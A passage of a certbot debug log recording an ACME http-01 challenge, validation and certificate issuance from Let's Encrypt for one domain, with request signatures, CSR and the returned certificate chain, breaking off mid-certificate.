"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ5RUlQLW5xTVVKc0huVUx0cW9ZMW41YVM3VFFscFl0VlVVdUVoUFlqTGtqY2ZzbU9fRzAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjUxNTM3NjMyMjE2In0", + "signature": "ZoEpVgPlFDmd8bXwPC8mEywak1GzEhnH5TL9oTqJCEqkudocPSWrWCgAShHb3XsAXmgK6qFDTBb6Q0NcuLMBVyQBnqMLg19ayO0gmDxrxMr7tJmllbQPt0p1gT4dskCcb5MOMY2BhtRBo-O3WQMCzletgsI8K3oJXznQxJ6FUWaM7jTAaC3g7-l_0RDfZd2iM0RdL_QwDu2mrD4kQ7L5GVFCPepLbgLxenxOTcEbXQ18wI8OyupD-3VyCQjDHZa31kQ1c4ML5uVHCi1YrQQVjvTm6vShZrMMwiA94Ez7L-LKTwqf3a2cGX8cVMlQFC9WLZA97PsRsqkSmdqUeYh7hw", + "payload": "" +} +2026-01-31 10:05:22,687:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/651537632216 HTTP/1.1" 200 823 +2026-01-31 10:05:22,688:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:22 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: ay3RMBSdH-87-cZv-9wLrsQ_oIQmyeYWTuhHwirse9X9uZO88xE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "net.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-07T10:05:22Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/_NFFqg", + "status": "pending", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/qW6TFw", + "status": "pending", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/XPNE4A", + "status": "pending", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" + } + ] +} +2026-01-31 10:05:22,688:DEBUG:acme.client:Storing nonce: ay3RMBSdH-87-cZv-9wLrsQ_oIQmyeYWTuhHwirse9X9uZO88xE +2026-01-31 10:05:22,689:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/_NFFqg', 'status': 'pending', 'token': '9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ'} +2026-01-31 10:05:22,690:INFO:certbot._internal.auth_handler:Performing the following challenges: +2026-01-31 10:05:22,690:INFO:certbot._internal.auth_handler:http-01 challenge for net.profibot.hu +2026-01-31 10:05:22,690:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2026-01-31 10:05:22,691:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2026-01-31 10:05:22,693:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ +2026-01-31 10:05:22,694:DEBUG:acme.client:JWS payload: +b'{}' +2026-01-31 10:05:22,698:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/XPNE4A: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJheTNSTUJTZEgtODctY1p2LTl3THJzUV9vSVFteWVZV1R1aEh3aXJzZTlYOXVaTzg4eEUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjUxNTM3NjMyMjE2L1hQTkU0QSJ9", + "signature": "ijmDMEed6jN9nS23ERWHlpA54FnbPlZUBmg_ALv5znwyd6-6xA_Ot5RfbBnRe7rcZ6XIJAsov-0eDJ1lBSBfeV4H-dyk19P2gROg7p_u3bmua_dYDYFbcn7l_Bj0c0Iuap4eveampVnc8B7VDJENijKtp_tDxy_DwgtYweDghd3IJsyCJFwI8qkT9BLE81SLcpnX_wHSHbFi2n8g2uTY2Q0SeJRezju7ttvbqTzI8rwHjF4decc9hG8OMk7pNq9dloQnd64Euq6pfhqFj0pfGIZgZ8E6vNBuIlaAYXGmeXf1UbJeko7Ts9peQsBtsCMvr3ojsbe_uhdg8o-vacvenQ", + "payload": "e30" +} +2026-01-31 10:05:22,845:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/651537632216/XPNE4A HTTP/1.1" 200 195 +2026-01-31 10:05:22,846:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:22 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/XPNE4A +Replay-Nonce: yEIP-nqMLNdX8m4EfTqCP6_Afr-3Hu3FSV_VJuWX44NyxrcYxg4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/XPNE4A", + "status": "pending", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" +} +2026-01-31 10:05:22,847:DEBUG:acme.client:Storing nonce: yEIP-nqMLNdX8m4EfTqCP6_Afr-3Hu3FSV_VJuWX44NyxrcYxg4 +2026-01-31 10:05:22,848:INFO:certbot._internal.auth_handler:Waiting for verification... +2026-01-31 10:05:23,848:DEBUG:acme.client:JWS payload: +b'' +2026-01-31 10:05:23,852:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/651537632216: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ5RUlQLW5xTUxOZFg4bTRFZlRxQ1A2X0Fmci0zSHUzRlNWX1ZKdVdYNDROeXhyY1l4ZzQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjUxNTM3NjMyMjE2In0", + "signature": "MQMJ_ZoomdRsuURxyDxh5rr4uDQY_wJOuD7eHbUDWWFBg5vRnv9V2QupMDWysogv7k5NQyaMrMLrJOSt5APblCOVwvsGTwpxyWB_oTH1PsuddmW8ZFb0eKqwmC0n_37Bg_eevcxKmizeBHTxDGfXMNGpVyp_EKBX-aXgCBgyEOadr53FXE037ZoXpscDb1wLkN7giNcKvI-Q52s9bC8vUYvFpx3-npqX_1u8JJURYRKvX86LosjsF7uhXyjVGR5w4R27vOVrj5PO3xdExY1prorkOSoC4PL7X4IaW9DMBo61oxso9j7aJ4JyH28o818qQEbWe107epaTK7kT50es4A", + "payload": "" +} +2026-01-31 10:05:24,021:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/651537632216 HTTP/1.1" 200 823 +2026-01-31 10:05:24,022:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:23 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: yEIP-nqMO-2tABidFSKnaQe9YUjiSVbuy7hm8dehfLShUQeHFGo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "net.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-07T10:05:22Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/qW6TFw", + "status": "pending", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/XPNE4A", + "status": "pending", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/_NFFqg", + "status": "pending", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ" + } + ] +} +2026-01-31 10:05:24,022:DEBUG:acme.client:Storing nonce: yEIP-nqMO-2tABidFSKnaQe9YUjiSVbuy7hm8dehfLShUQeHFGo +2026-01-31 10:05:24,023:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/_NFFqg', 'status': 'pending', 'token': '9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ'} +2026-01-31 10:05:27,024:DEBUG:acme.client:JWS payload: +b'' +2026-01-31 10:05:27,028:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/651537632216: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ5RUlQLW5xTU8tMnRBQmlkRlNLbmFRZTlZVWppU1ZidXk3aG04ZGVoZkxTaFVRZUhGR28iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjUxNTM3NjMyMjE2In0", + "signature": "b0m4xnWblsFdSYe_CQu-pCn9gUkEFxdBcRgqWm5X_0o147qavELg3S4JfECoAaR0yjRYGKFDGoVsrfiKtPhOpwNCca-vlbI7Zr7E890d8tljc0bDrRW1g3W4LFXQkECruU5mUlWTABs7k0voEf4gvJe6IQlwBymVm4DJLwNu4XKMfMoMTFlzdGJpJQZtSa5dEKNbiZSO86OS_FZScgwrU5sLieDunkjHgxuI8hy0hetg59Yy_oUIS_iLZm9vFmhBMK2ShPMOmPaduhB9dGG76Hd08uScCRWSAauchwCJm7Q3d-2xzeElwi_kYuS6u8sYMtPtuDzGh5QYWfA9ejP5AQ", + "payload": "" +} +2026-01-31 10:05:27,172:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/651537632216 HTTP/1.1" 200 768 +2026-01-31 10:05:27,172:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:27 GMT +Content-Type: application/json +Content-Length: 768 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: ay3RMBSdxshyN1oc2p-fN6E2Dp2ktt4_LiJOUGpgxHq4HstlhBo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "net.profibot.hu" + }, + "status": "valid", + "expires": "2026-03-02T10:05:26Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/651537632216/XPNE4A", + "status": "valid", + "validated": "2026-01-31T10:05:22Z", + "token": "9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ", + "validationRecord": [ + { + "url": "http://net.profibot.hu/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ", + "hostname": "net.profibot.hu", + "port": "80", + "addressesResolved": [ + "91.82.215.191" + ], + "addressUsed": "91.82.215.191" + } + ] + } + ] +} +2026-01-31 10:05:27,172:DEBUG:acme.client:Storing nonce: ay3RMBSdxshyN1oc2p-fN6E2Dp2ktt4_LiJOUGpgxHq4HstlhBo +2026-01-31 10:05:27,173:DEBUG:certbot._internal.error_handler:Calling registered functions +2026-01-31 10:05:27,173:INFO:certbot._internal.auth_handler:Cleaning up challenges +2026-01-31 10:05:27,173:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/9iGNFW6EvQxQe-hcWyitqZPIznE-jNZDyCPKP-ml-pQ +2026-01-31 10:05:27,174:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2026-01-31 10:05:27,174:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBJDCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAErC1bfjZpXb/xqu6b\nSE+L6MUnQAznAMyPfGn6/J613WkbLSNPuJ64qlQid5fBmQ1d0zV4nMilJ+jIDvXL\nQM7zD2yXunq9uW3X7F9bn+BOxWD1/AfTEv3jdTZhfwRCzlJ7oC0wKwYJKoZIhvcN\nAQkOMR4wHDAaBgNVHREEEzARgg9uZXQucHJvZmlib3QuaHUwCgYIKoZIzj0EAwID\nZwAwZAIwDFvIEw6t4LoR+Dj8vYvtDFrFc1qJ5NDD5q4yUivf3MMFvHQOsuqmYU/W\nFh9lE4ZxAjA6YOat/HmakAdJYVtWli4ZgrcZcGhLeI0ni0NpR1YDMVLx/PVCwfY8\nF53jZmOvAM4=\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2026-01-31 10:05:27,174:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2026-01-31 10:06:57.174754 +2026-01-31 10:05:27,175:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBJDCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAErC1bfjZpXb_xqu6bSE-L6MUnQAznAMyPfGn6_J613WkbLSNPuJ64qlQid5fBmQ1d0zV4nMilJ-jIDvXLQM7zD2yXunq9uW3X7F9bn-BOxWD1_AfTEv3jdTZhfwRCzlJ7oC0wKwYJKoZIhvcNAQkOMR4wHDAaBgNVHREEEzARgg9uZXQucHJvZmlib3QuaHUwCgYIKoZIzj0EAwIDZwAwZAIwDFvIEw6t4LoR-Dj8vYvtDFrFc1qJ5NDD5q4yUivf3MMFvHQOsuqmYU_WFh9lE4ZxAjA6YOat_HmakAdJYVtWli4ZgrcZcGhLeI0ni0NpR1YDMVLx_PVCwfY8F53jZmOvAM4"\n}' +2026-01-31 10:05:27,178:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/475360564716: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJheTNSTUJTZHhzaHlOMW9jMnAtZk42RTJEcDJrdHQ0X0xpSk9VR3BneEhxNEhzdGxoQm8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDc1MzYwNTY0NzE2In0", + "signature": "cWjy9EujL1qvc7JEf0eXW2B2gj3NtLS_AuIq4cCJ-7JGpalbevrlriXPTyKgFxJD0D7eBEEvJg6c39YKzKjCGArv1H25e1K79Mj3425D_UjQUxu_EpiFzXlP_BrcygX59r1lo87_9-Fbq0K-XrpiujvULLr7bU4er6aQHl40nWf4_-b0Nspj7SQznnwyUz3-CKFfUM6iGTTSoeweLbRRqbWWQd2wZ0Ij3sNSauvXXe1QKpf4sVCBlp7-uJsL8FMxTUNS5VvBFFXNyi8HFI3McT-Emhv7empn3R4D3kRgysyR965pUDcM7uFu0VfUbSZU-cGpi4BlpJA2PjtQrhWEIw", + "payload": "ewogICJjc3IiOiAiTUlJQkpEQ0JyQUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFckMxYmZqWnBYYl94cXU2YlNFLUw2TVVuUUF6bkFNeVBmR242X0o2MTNXa2JMU05QdUo2NHFsUWlkNWZCbVExZDB6VjRuTWlsSi1qSUR2WExRTTd6RDJ5WHVucTl1VzNYN0Y5Ym4tQk94V0QxX0FmVEV2M2pkVFpoZndSQ3psSjdvQzB3S3dZSktvWklodmNOQVFrT01SNHdIREFhQmdOVkhSRUVFekFSZ2c5dVpYUXVjSEp2Wm1saWIzUXVhSFV3Q2dZSUtvWkl6ajBFQXdJRFp3QXdaQUl3REZ2SUV3NnQ0TG9SLURqOHZZdnRERnJGYzFxSjVOREQ1cTR5VWl2ZjNNTUZ2SFFPc3VxbVlVX1dGaDlsRTRaeEFqQTZZT2F0X0htYWtBZEpZVnRXbGk0WmdyY1pjR2hMZUkwbmkwTnBSMVlETVZMeF9QVkN3Zlk4RjUzalptT3ZBTTQiCn0" +} +2026-01-31 10:05:31,061:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/475360564716 HTTP/1.1" 200 451 +2026-01-31 10:05:31,062:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:30 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/475360564716 +Replay-Nonce: ay3RMBSd9G85jckij-w02FitSDk6MqNDl51eAQn0-Um9wObiOLQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-02-07T10:05:22Z", + "identifiers": [ + { + "type": "dns", + "value": "net.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/651537632216" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/475360564716", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06315b868bc313fff79c1678826fc5353bb5" +} +2026-01-31 10:05:31,062:DEBUG:acme.client:Storing nonce: ay3RMBSd9G85jckij-w02FitSDk6MqNDl51eAQn0-Um9wObiOLQ +2026-01-31 10:05:32,063:DEBUG:acme.client:JWS payload: +b'' +2026-01-31 10:05:32,067:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/475360564716: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJheTNSTUJTZDlHODVqY2tpai13MDJGaXRTRGs2TXFORGw1MWVBUW4wLVVtOXdPYmlPTFEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDc1MzYwNTY0NzE2In0", + "signature": "lvYRZTqWcHOG-4o-vT_mSN8QRejTNbN76pOiMK3k6pAbB6CJpDEUmFZHqF_FPKqjAZlUbVdNRD-G_VcVx9DYHv8yPg-Z5NR8EZLEsuTrlSepjr46E_3Bt33JKvaTDdKBV2xwCNxkpkwiUJaJXtej4lUajkUQ4jGAufz2KzknNfMbAFHQ-l2OvKigEiWolAbOsXgzAt1C9vCjC4k1att3wLzHkqWi0bO8SrDFv1RiyLVE8YsqmycupM76GIYOSlcJN6ZkPSBjoEO9ZI6kT_E7OR2YvaJlmAiBO41_6vednp1u1BihCGx1s2-g_hgYfL4EO-TWhbuf6o6KMw7Dy5ax8A", + "payload": "" +} +2026-01-31 10:05:32,223:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/475360564716 HTTP/1.1" 200 451 +2026-01-31 10:05:32,224:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:32 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/475360564716 +Replay-Nonce: ay3RMBSd-4jyVLB8l1ia7t_u3wNw42En6ZoDSKmC8n8igUO94V0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-02-07T10:05:22Z", + "identifiers": [ + { + "type": "dns", + "value": "net.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/651537632216" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/475360564716", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06315b868bc313fff79c1678826fc5353bb5" +} +2026-01-31 10:05:32,225:DEBUG:acme.client:Storing nonce: ay3RMBSd-4jyVLB8l1ia7t_u3wNw42En6ZoDSKmC8n8igUO94V0 +2026-01-31 10:05:32,225:DEBUG:acme.client:JWS payload: +b'' +2026-01-31 10:05:32,228:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06315b868bc313fff79c1678826fc5353bb5: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJheTNSTUJTZC00anlWTEI4bDFpYTd0X3Uzd053NDJFbjZab0RTS21DOG44aWdVTzk0VjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzMTViODY4YmMzMTNmZmY3OWMxNjc4ODI2ZmM1MzUzYmI1In0", + "signature": "exieZUD1U2gF-_TwUhWBhMEnPlcee7X4xwW5wd4TrcdiqVnRTNAyaUZQnJ39c3ta1-1ZfqmlWxgJBz_J3et69Rr6ZCZpUsoL_9k5id6K_IgUU7OND-2cDf6N1fons88LAUPfEOPAzyXRKalz2mKmJR6Pw1U236XJ60tAdJiNxrkE0CvCVAQoVC-zEwd0eym1_8Gf-KCSz2nUMJ180-vuh7OpEQLYzTBUbyAU7-jmSLSaTEgGhtBFC6Xtfca7rWc0yhL786sMsSQ7wS-cVR06SysdGIno6dcXDP3C4kmGXznLm0x6YjL_3BraXGk9J3Z201hvkhws4ovJRIQGT8-Dig", + "payload": "" +} +2026-01-31 10:05:32,377:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06315b868bc313fff79c1678826fc5353bb5 HTTP/1.1" 200 2909 +2026-01-31 10:05:32,378:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Sat, 31 Jan 2026 10:05:32 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2909 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: yEIP-nqM01FjQUoc2_FXJt02E3i6ZSDaGSgESgkfdjTL79QkK1A +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDsTCCAzegAwIBAgISBjFbhovDE//3nBZ4gm/FNTu1MAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNjAxMzEwOTA2NTdaFw0yNjA1MDEwOTA2NTZaMBoxGDAWBgNVBAMTD25l +dC5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABKwtW342aV2/8aru +m0hPi+jFJ0AM5wDMj3xp+vyetd1pGy0jT7ieuKpUIneXwZkNXdM1eJzIpSfoyA71 +y0DO8w9sl7p6vblt1+xfW5/gTsVg9fwH0xL943U2YX8EQs5Se6OCAiYwggIiMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUOlAzyMRGz5HGJrDsyJNQN8xYXPQwHwYDVR0j +BBgwFoAUrkie3IcdRKBv2qLlYHQEeMKcAIAwMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTcuaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD25ldC5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTcuYy5sZW5jci5vcmcvNTQuY3JsMIIBDQYKKwYBBAHWeQIEAgSB +/gSB+wD5AHcAZBHEbKQS7KeJHKICLgC8q08oB9QeNSer6v7VA8l9zfAAAAGcE4PA +iQAABAMASDBGAiEAv+4DwsX4jIx6nG9ZV5CR5CJ+FB9I5TKHKCYLKMWnmuICIQDR +sr3yyIt2qCshqvJoOjBfNDgBNMMtB+rEVh9Lrz32cwB+AOMjjfKNoojgquCs8PqQ +yYXwtr/10qUnsAH8HERYxLboAAABnBODzBsACAAABQAxDn+2BAMARzBFAiAFE1ng +Njlf4v9w4myFSMbNP/0q/tDHCMa/ZN6KDW4eOwIhAK7O1PsZHPDGyD+RVCe2/29M +yOZP77xQX/Rd2BUwEFrPMAoGCCqGSM49BAMDA2gAMGUCMQDhQzE/vL0ff3F4jd2T +M43TFzRvMfgR4ktiP2qZLocN/l5Ea0IgIlWmRecgn9llnVkCMH1VRUmNekGdpXAM +aFgs8T3Wl3B1AydeIxReo2TYbyDM7QdiRjlc9RmjL+IfPw6S9A== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw +WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg +RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST +CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef +QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw +gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD +ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4 +wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB +AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g +BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu +Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD +aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF +h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG +yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr +OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o +yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S +M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ +UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq +Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I +tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ 